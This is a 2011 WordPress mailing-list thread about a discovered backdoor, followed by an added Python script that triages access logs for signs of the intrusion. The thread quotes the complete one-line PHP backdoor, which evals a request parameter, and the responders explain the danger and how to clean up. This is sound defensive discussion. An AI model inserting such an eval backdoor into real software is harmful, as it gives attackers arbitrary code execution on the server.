[wp-hackers] Possible Exploit

Charles Frees-Melvin wordpress at cefm.ca
Sun Jun 12 13:05:09 UTC 2011


That is quite common. Many attacks are from other non-secure sites on the same server.

--
Charles E. Frees-Melvin
www.cefm.ca

On 2011-06-12, at 10:00, Baki Goxhaj <banago at gmail.com> wrote:

> Wrote to my hosting account. This is what they are saying:
> 
>> Due to the clustered structure of our systems there is no single log file
>> for you to use as your site is served by many servers. I would suggest you to
>> please make a full audit of your account in that regards and remove the
>> malicious code if you find any.
>> 
> 
> Crazy - I have like 15 websites on there.
> 
> Kindly,
> 
> Baki Goxhaj
> www.wplancer.com | proverbhunter.com | www.banago.info<http://proverbhunter.com>
> 
> 
> On Sun, Jun 12, 2011 at 2:14 PM, Dion Hulse (dd32) <wordpress at dd32.id.au> wrote:
> 
>> Check your access logs for strange requests at the time the file was
>> detected. You'll hopefully be able to see a POST request to one of the
>> plugin files at that point in time, or perhaps a long GET request. If you
>> can narrow down the file attacked, you can work out which plugin has the
>> vulnerability in it.
>> 
>> On 12 June 2011 21:59, Baki Goxhaj <banago at gmail.com> wrote:
>> 
>>> I removed it as soon as I found out about it. I hope my other installs are not
>>> infected as I don't have the file monitor running there.
>>> 
>>> Kindly,
>>> 
>>> Baki Goxhaj
>>> www.wplancer.com | proverbhunter.com | www.banago.info<http://proverbhunter.com>
>>> 
>>> 
>>> On Sun, Jun 12, 2011 at 1:56 PM, Jon Cave <jon at lionsgoroar.co.uk> wrote:
>>> 
>>>> On Sun, Jun 12, 2011 at 12:45 PM, Baki Goxhaj <banago at gmail.com> wrote:
>>>>> Just got an email from my file monitor plugin that a file had been changed -
>>>>> it is an inactive plugin file, strangely enough. Here is the content of the
>>>>> file now:
>>>>> 
>>>>> <?php if(isset($_REQUEST['asc']))eval(stripslashes($_REQUEST['asc'])); ?>
>>>>> 
>>>>> Is this something dangerous?
>>>> 
>>>> Yes this is extremely dangerous. It's basically a backdoor to allow
>>>> arbitrary PHP code execution on your server. You should remove that
>>>> code immediately, change passwords, do a full cleanup, etc.
>>>> _______________________________________________
>>>> wp-hackers mailing list
>>>> wp-hackers at lists.automattic.com
>>>> http://lists.automattic.com/mailman/listinfo/wp-hackers
>>>> 
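
The access-log check suggested in the quoted replies, as an added example that is not part of the original thread: it flags POST requests to plugin PHP files, long GET requests, and requests carrying the `asc` parameter the quoted backdoor reads, within a window around the file monitor's alert. The Combined Log Format, the 200-character threshold, the one-hour window and all sample log lines are assumptions constructed for illustration.

```python
import re
from datetime import datetime, timedelta, timezone
from urllib.parse import urlsplit, parse_qs

# Combined Log Format prefix: ip ident user [time] "METHOD target PROTO" status
LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                     r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
PLUGIN_DIR = "/wp-content/plugins/"
LONG_QUERY = 200        # assumed cut-off for a "long GET request"
BACKDOOR_PARAM = "asc"  # request parameter read by the backdoor quoted in the thread

def triage(lines, detected_at, window=timedelta(hours=1)):
    """Return suspicious requests logged within `window` of the file-monitor alert."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        if abs(ts - detected_at) > window:
            continue
        url = urlsplit(m["target"])
        reasons = []
        if (m["method"] == "POST" and url.path.startswith(PLUGIN_DIR)
                and url.path.endswith(".php")):
            reasons.append("POST to plugin file")
        if m["method"] == "GET" and len(url.query) > LONG_QUERY:
            reasons.append("long GET query")
        if BACKDOOR_PARAM in parse_qs(url.query, keep_blank_values=True):
            reasons.append("backdoor parameter in query")
        if reasons:
            hits.append((ts, m["ip"], m["method"], url.path, reasons))
    return hits

# Constructed sample data: documentation IP ranges, made-up plugin paths and times.
DETECTED_AT = datetime(2011, 6, 12, 11, 40, tzinfo=timezone.utc)
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Jun/2011:11:02:13 +0000] "GET /wp-login.php HTTP/1.1" 200 2301',
    '198.51.100.7 - - [12/Jun/2011:11:31:05 +0000] "POST /wp-content/plugins/example-plugin/upload.php HTTP/1.1" 200 15',
    '198.51.100.7 - - [12/Jun/2011:11:33:40 +0000] "GET /wp-content/plugins/old-plugin/file.php?asc=PLACEHOLDER HTTP/1.1" 200 0',
    '192.0.2.10 - - [12/Jun/2011:11:35:00 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 40',
    '203.0.113.5 - - [12/Jun/2011:11:36:10 +0000] "GET /?s=' + "A" * 300 + ' HTTP/1.1" 200 512',
    '198.51.100.7 - - [11/Jun/2011:03:00:00 +0000] "POST /wp-content/plugins/example-plugin/upload.php HTTP/1.1" 200 15',
]

if __name__ == "__main__":
    for ts, ip, method, path, reasons in triage(SAMPLE_LOG, DETECTED_AT):
        print(ts.isoformat(), ip, method, path, "; ".join(reasons))
```

Access logs normally record the query string but not the POST body, so a parameter sent by POST shows up only as a POST to the affected file.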

